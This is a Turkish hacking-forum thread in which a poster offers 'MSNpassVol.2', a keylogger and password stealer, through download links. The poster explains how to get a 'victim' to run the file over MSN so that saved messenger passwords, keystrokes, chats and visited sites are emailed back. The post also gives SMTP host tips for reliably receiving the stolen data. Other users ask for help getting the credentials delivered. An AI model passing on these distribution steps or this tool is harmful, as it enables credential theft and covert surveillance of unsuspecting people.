msn,yahoo vb herşeyin şifresi artık elinizde(garneet1 farkıyla)

levent308

Yeni üye
28 Tem 2006
3
0
Merhaba Tam Aradigim Tipten Bir Program Amaaa... Bu Program Bende Calismadi Serveri Kurdum Sonra Server Dosyasini Da Calistirdim Ama Bana Mail Falan Gelmedi ..

levent308

Yeni üye
28 Tem 2006
3
0
Bu Arada Server Dosyasini Actigimda Program Sisteminizde Duzgun Calismamaktadir Diye Bir Uyari Veriyo Yardim Bekliyorum Acil

efendibiri

Yeni üye
17 Şub 2007
7
0
ben hotmail kullanıyorum bunun hostuna ne yazacaz peki bu arada program güzelmiş saol paylasım için. milli olacam ilk defa :)))

kaabus

Yeni üye
17 Ocak 2007
11
0
nasıl bu programları yapıyorlar anlamıyom ben guvenlikte iyiyim diyordum msn adreslerim ve forum siştem hacklendi bunun için hackerlıgı bırazda olsa öğrenmek istiyorum yardımcı olabılecek hacker arıyorum ? var mı?

bebekcik61

Yeni üye
12 Şub 2007
5
0
MSNpassVol.2; kullanıcının girdiği tüm şifreleri [msn, admin, kredi kartı, forum vb...]
ele geçirebilen, chat programlarında [MSN, GTalk, Icq, Mirc vb..] kimlerle ne
konuşulduğu hakkında bilgi veren, kısaca karşı bilgisayardaki klavye kayıtlarını
düzenli bir şekilde size raporlayabilen programdır.

Program basit bi arayüze sahiptir bu yüzden yardım bölümü eklemedim,
kutulara ne dolduracağınızı veya butonların ne işe yaradığını öğrenmek
istiyorsanız nesnelerin üzerinde fareyle kısa bir süre bekleyin...

Ekran görüntüsü
https://tik.lat/Iu5XY

Link1 : https://tik.lat/GpUwa

Link2 : https://tik.lat/VfWtC

(Rar şifresi içindedir)

Ayrıntılı Bilgi Almak İsteyen !

Öncelikle; bu program %100 işe yarıo eğer kurbana dosyayı bi şekilde yedirebilirseniz şifreler elinizde olcak!

Merhaba arkadaşlar, bi süredir kodlayıp kullandıım programı biras eklemeler yaparak sizlere sunuyorum.

Programın amacı; oluşturduğumuz dosyayı msn'den kurbana atınca bilgisayarındaki şifreler mail yoluyla bize geliyor.Eğer şaka yapmak isterseniz kurban size kendi elleriyle MSN şifresini yolluo nası oluo derseniz; kurban MSN'den düştüğünde tekrar online oluo ve size mesaj yollamak istio, sizin MSN pencerenizi açtığı anda şifreleri mesajla size iletmişi oluyo

Programın kullanımını fazla anlatmicam çünkü basit bi pro ve gerekli yardım programda mevcut..

*Dosyayı kurbana atıınızda "rundll32" hatası verio ve MSN zorla kapatılıo.Sonra kurbanımız MSN'i tekrar açıo ve bize programı sorcak ne işe yarıo die ama o bize bişey yazmadan şifreleri yolluo ...

*Eğer kurbanın şifreleri kayıtlıysa yaani MSN'e şifre yazarak girmiyosa sorun diil, kayıtlı şifreler mailinize ayrıca gelio.

---Programın alabildiği kayıtlı şifreler---

* MSN Messenger
* Windows Messenger (Windows XP)
* Yahoo Messenger (Versions 5.x ve 6.x)
* ICQ Lite 4.x/2003
* AOL Instant Messenger
* AOL Instant Messenger/Netscape 7
* Trillian
* Miranda
* GAIM

*Kurban bi kere dosyayı yediği zaman bilgisayarı kapatana kadar; kimlerle yazışmış hangi sitelere girmiş, girdiği veya kullandığı şifreli üyelikleri size mail yoluyla bildirir ve bildirme zaman aralığını ise kendiniz belirleyebilirsiniz

[Uyarı: Mail adresinizi yazdıktan sonra eğer bildiğiniz sağlam bi host yoksa program sizin yerinize bulabilir ama tavsiye etmiyorum mesela; hotmaile şifreler gitmio arasıra gidio kafasına göre takılıo, yahooyu denemedim, GMAİL herzaman çalışıo lütfen gmail kullanın sizi yarı yolda bırakmaz!Eğer Gmail kullanırsanız yardım bölümünde yazdıım gibi host yerine "gsmtp185.google.com" bunu yazarsanız şifreler direkt inboxa gelir spam olarak değerlendirilmez ve herzaman çalışan bi host!]

Kolay Gelsin..

arkadaşım tamam herşeyi hazırladım kurbana da yedirdim fakat şifreler gelmiyor süreyide hatta 10 dkişkaya indirdim sadece anlamadığım orda kullanılan host diyor oraya neden gsmtp185.google.com bu adresi veriyoruz bu adres ne işe yarıyor anlatırsan sevinirim bu arada kendi mail adresimide gmail olarak yazdım yoksa oraya kurbanın mı mail adresini yazacaz

ilgilenirsen sevinirim

abidiq

Yeni üye
19 Şub 2007
1
0
Valla yanlislikla kuruldu bu program pc e ne siliniyor ne tasiniyor be baska sey oluyor bence denemeyin format pc nize atmak zorunda kalirsiniz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.